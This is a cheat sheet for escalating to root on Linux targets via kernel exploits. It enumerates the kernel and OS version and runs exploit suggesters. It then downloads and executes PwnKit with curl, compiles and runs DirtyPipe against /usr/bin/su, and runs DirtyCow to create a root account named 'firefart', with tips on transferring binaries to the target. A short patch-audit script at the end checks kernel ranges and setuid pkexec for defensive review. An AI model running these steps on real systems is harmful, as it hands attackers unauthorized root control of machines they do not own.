Escalate privileges via Linux kernel exploits. Enumerate kernel and OS version to identify matching exploits like PwnKit, DirtyPipe, and DirtyCow.
```shell
# ============================================================
# ENUMERATION — Kernel and OS version
# ============================================================

# Get kernel version (full and short)
uname -a
uname -r

# Get OS release information
cat /etc/*-release
cat /etc/os-release
cat /etc/issue

# Check architecture
arch
dpkg --print-architecture 2>/dev/null

# ============================================================
# AUTOMATED EXPLOIT SUGGESTION
# ============================================================

# linux-exploit-suggester (run on target)
# https://github.com/The-Z-Labs/linux-exploit-suggester
./linux-exploit-suggester.sh

# Or searchsploit (on attacker)
searchsploit linux kernel $(uname -r | cut -d'-' -f1)

# ============================================================
# PwnKit (CVE-2021-4034)
# ============================================================
# Works on most Ubuntu/Debian/CentOS with polkit installed
# Try this FIRST on any Ubuntu target
# https://github.com/ly4k/PwnKit
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x PwnKit
./PwnKit

# ============================================================
# DirtyPipe (CVE-2022-0847) — kernel 5.8 to 5.16.11
# ============================================================
# https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
gcc -o dirtypipe exploit.c
./dirtypipe /usr/bin/su

# ============================================================
# DirtyCow (CVE-2016-5195) — kernel 2.6.22 to 4.8.3
# ============================================================
# https://github.com/firefart/dirtycow
gcc -pthread dirty.c -o dirty -lcrypt
./dirty P@ssw0rd
# Creates user "firefart" with root privileges
su firefart

# ============================================================
# NOTES
# ============================================================
# - On Ubuntu, always try PwnKit first
# - Search Google for "kernel <version> privilege escalation"
# - Check searchsploit for matching exploits
# - Compile exploits on a similar OS/arch to avoid library issues
# - Transfer compiled binary to target for execution
```
https://github.com/The-Z-Labs/linux-exploit-suggester
https://github.com/ly4k/PwnKit
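The same version enumeration can drive a patch audit on hosts you administer. The script below is an added example, not part of the original cheat sheet: it compares a kernel release string against the two upstream ranges quoted above and checks for a setuid `pkexec`. The function names are hypothetical, and the upper bound of each range is assumed to be the first fixed upstream release, so it is excluded. Stable and distribution kernels backport fixes, so a match is a prompt to check the vendor advisory, not proof of exposure.

```shell
#!/bin/sh
# Added example (not from the original page): patch-audit helper.
# Ranges are the upstream ones quoted on this page; the upper bound is
# assumed to be the first fixed release, so it is excluded.

# ver_key RELEASE: "5.15.0-91-generic" -> 50001500000 (numeric, comparable)
ver_key() {
    printf '%s\n' "$1" | awk '{
        sub(/[^0-9.].*$/, "")            # drop distro suffix (-91-generic, +, rc1)
        split($0, p, ".")
        printf "%d%05d%05d", p[1], p[2], p[3]
    }'
}

# in_range RELEASE LOW FIXED: true when LOW <= RELEASE < FIXED
in_range() {
    k=$(ver_key "$1"); lo=$(ver_key "$2"); hi=$(ver_key "$3")
    [ "$k" -ge "$lo" ] && [ "$k" -lt "$hi" ]
}

# kernel_findings [RELEASE]: print the CVE ids whose range contains RELEASE
kernel_findings() {
    rel=${1:-$(uname -r)}
    in_range "$rel" 5.8 5.16.11 && echo "CVE-2022-0847"
    in_range "$rel" 2.6.22 4.8.3 && echo "CVE-2016-5195"
    return 0
}

# pkexec_setuid: true if a setuid pkexec is on PATH (component behind CVE-2021-4034)
pkexec_setuid() {
    p=$(command -v pkexec 2>/dev/null) && [ -u "$p" ]
}

audit_report() {
    echo "kernel release: $(uname -r)"
    for cve in $(kernel_findings); do
        echo "REVIEW $cve: upstream range matches, confirm against the vendor advisory"
    done
    if pkexec_setuid; then
        echo "REVIEW CVE-2021-4034: setuid pkexec present, confirm the polkit package version"
    fi
    return 0
}

audit_report
```

Pass a release string to `kernel_findings` to audit inventory data collected from other hosts instead of the running kernel.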